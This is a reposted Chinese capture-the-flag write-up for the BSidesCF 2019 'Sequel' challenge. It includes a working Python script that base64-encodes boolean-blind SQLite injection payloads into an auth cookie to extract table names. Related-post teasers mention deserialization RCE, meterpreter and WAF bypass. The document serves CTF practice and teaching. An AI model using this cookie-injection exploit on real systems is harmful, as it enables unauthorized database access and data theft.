安科网

[BSidesCF 2019]Sequel SQLite注入

Dlanguage

Dlanguage

2020-02-22

关注 关注

[BSidesCF 2019]Sequel SQLite注入

新知识点 :拿到任意账号后 得到cookie ,再篡改cookie进行注入


原创 HyyMbb 最后发布于2020-02-15 20:51:45 阅读数 16 收藏
展开
题目描述

首先是登录,我们爆破一下就好了~~
然后得到用户名和密码均为guest~~
这时登录成功后会返回一个cookie,而且长得很可疑~~

set-cookie: 1337_AUTH=eyJ1c2VybmFtZSI6Imd1ZXN0IiwicGFzc3dvcmQiOiJndWVzdCJ9; HttpOnly

    1

base64 解密一下得到

{"username":"guest","password":"guest"}

    1

于是我们猜测是通过cookie注入~·
但是没想到得是数据库是SQLite,而不是mysql,搞了半天~~~
exp

import requests
import base64
import string
import sys
out = ""
while True:
    for letter in string.printable:
        tmp = out + letter
        payload = r‘{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\" limit 1) OR \"","password":"guest"}}‘.format(tmp + ‘%‘)
        payload = base64.b64encode(payload.encode(‘utf-8‘)).decode(‘utf-8‘)
        r = requests.get(‘https://sequel-9cba4c8e.challenges.bsidessf.net/sequels‘, cookies={"1337_AUTH" : payload})
        if "Movie" in r.text:
            out = tmp
            sys.stdout.write(letter)
            sys.stdout.flush()
            break

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16

查询所有表名(必须自己手工多次查询)

拆了列名 username,password
————————————————
版权声明:本文为CSDN博主「HyyMbb」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/a3320315/article/details/104334246

payload sqlite

Dlanguage

Dlanguage

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

手写Vuex源码

Vuex是基于Vue的响应式原理基础,所以无法拿出来单独使用,必须在Vue的基础之上使用。首先我们要清楚Vuex的定位,它是一个插件。且必须基于之上Vue来使用,为什么这么说呢,因为他的数据响应是基于Vue的。③ Mutation 进行Vuex中store

Cricket 2020-07-27

使用Requests库实现api接口测试(Python)(一)

  构建HTTP请求消息,并且解析收到的HTTP响应消息,根据业务场景来判断是否符合预期。  用来做收发http请求。paras={ ‘key1‘:‘value1‘, ‘key2‘:‘value2‘}    。  r.content.decod

zhanglao 2020-06-26

4 HTTP协议及Requests库方法

# requests库head()方法:得到头部信息。# requests库post()方法:向表单增加信息。payload = {‘key1‘: ‘value1‘, ‘key2‘:‘value2‘}. # requests库put()方法:覆盖原有数据

zkwgpp 2020-06-04

sqlmap过狗脚本练习1

本地搭建sql注入网站练习。测试安全狗,输入不合法参数被安全狗拦截:。检测到防护机制,失败;将空格替换为 “/*//\*//\*\/c*/” 成功绕过安全狗;if i =="‘" and i==‘"‘:. 加上脚本继续跑:。(

徐悦TechBlog 2020-05-27

Shiro反序列化漏洞检测、dnslog

pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode(). encryptor = AES.new(base64.b64decode(key), mode, iv).

visionzheng 2020-05-05

Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现

然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。前16字节的密钥-->后面加入序列化参数-->AES加密-->base64编码-->发送cookie. python shiro_shell.py

visionzheng 2020-05-04

HTTP请求中的Form Data与Request Payload的区别

我看了前端发起的请求,请求正文并不是我熟悉的Form Data,而是Request Payload。如图注意下面两个请求的Content-Type的区别。Request Payload 大概格式如下,请求头部的Content-Type: applicati

sicceer 2020-04-20

xsser和XSStrike

xsser是一款用于针对Web应用程序自动化挖掘、利用、报告xss漏洞的框架。XSStrike是一款检测Cross Site Scripting的高级检测工具。XSStrike不是像其他工具那样注入有效负载并检查其工作,而是通过多个解析器分析响应,然后通过

zhuangnet 2020-04-07

meterpreter php payload && windows payload 学习

No Arch selected, selecting Arch: php from the payload. No encoder or badchars specified, outputting raw payload. 通过脚本上传到服务器。这里p

有梦就能实现 2020-03-04

xss练习闯关

先输入xxx发现就存在于<textarea></textarea>之前显示,那么我们需要把前后进行闭合,最后才会显示我们输入的内容。先输入xxx发现输的内容在双引号内,发现前面有三个双引号,那么肯定是没有闭合。我们输入前面任意一个p

xiaof 2020-02-26

DDoS防护实现概述

DDoS攻击,就像上面扫描的场景:一个恶意IP的请求到达服务器,应该掀不起什么波浪;但如果是成千上万台恶意肉鸡对同一个域名发起DDoS攻击,威力是绝对不容小觑的。对应到DDoS的攻击防护中,处理的思路颇有相似之处:第一,对服务器做横向扩容。按平时的业务访问

xiaoemo0 2020-02-20

【转帖】一款优秀的XSS批量检测工具

至少学会代码的编写与使用。NoXss是一个供web安全工程师批量检测xss隐患的脚本工具。其主要用于批量检测,比如甲方内部安全巡检,人工分析千万级的url资产是不现实的,NoXss使用多进程+协程的方式,支持高并发,可以出色的完成这一任务。NoXss主要是

xiaof 2020-01-12

Metasploit 使用Exploits(漏洞)

主动漏洞将利用特定的主机,运行直至完成,然后退出。“Brute-force(暴力)”模块将在受害者打开外壳时退出。如果遇到错误,模块执行将停止。以下示例利用先前获取的一组凭据来利用并获得目标系统上的反向shell。[*] Authenticating as

Sabrina 2019-12-31

sqlmap tamper脚本扩展开发(Bypass IPS)

首先先对比一下两个自带的tamper脚本,看看sqlmap调用tamper有没有依赖什么类库或者算法.例如调用tamper是导入之后调用脚本里的某函数,那么我们开发的tamper脚本也应该有调用要用到的函数,主要看算法吧,咳咳。* Useful to by

tanrong 2019-12-16

web实验三——pikachu之sql注入

使用单引号跳出字符串,最后使用#注释掉多余sql语句,跳过前面查表名字段名的步骤,直接给出最后payload:。select username from user where username like ‘%{$username}%‘;select use

gwn00 2019-12-13

SQL注入之Boolean型盲注

Boolean型的注入意思就是页面返回的结果是Boolean型的,通过构造SQL判断语句,查看页面的返回结果是否报错,页面返回是否正常等来判断哪些SQL判断条件时成立的,通过此来获取数据库中的数据。这儿以SQLi-Labs less5来进行演示Boolea

gwn00 2019-12-01

VUEX-action可以修改state吗

Vuex 的 store 中的状态的唯一方法是提交 mutation. action 提交的是 mutation,而不是直接变更状态且可以包含任意异步操作。`[vuex] mutation type: ${type}. Silent option has

phillip 2019-11-19

Web安全之XSS攻击

XSS攻击成功后,攻击者能够对用户当前浏览的页面植入恶意脚本,通过恶意脚本,控制用户的浏览器。这些用以完成各种具体功能的恶意脚本,被称为"XSS Payload"。XSS Payload实际上就是JavaScript脚本,所以任何Jav

xiaof 2019-11-08

vue-cli 基本配置

在vue3.0开始普及的时候,同时也收到了消息得知,从前使用vue2.0的各种依赖包在今后的更新中不再适用老版的vue,因此在新的项目中使用了vue3.0版本,以下是配置vue3.0的基础功能。根据2.0的原始方法,将vuex分为state.js、muta

墨龙吟 2019-11-04

python requests函数封装方法

封装request请求,#---------------------------------------------------. #----------------------------------------------------. res = r

meylovezn 2019-10-30
Dlanguage

Dlanguage

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号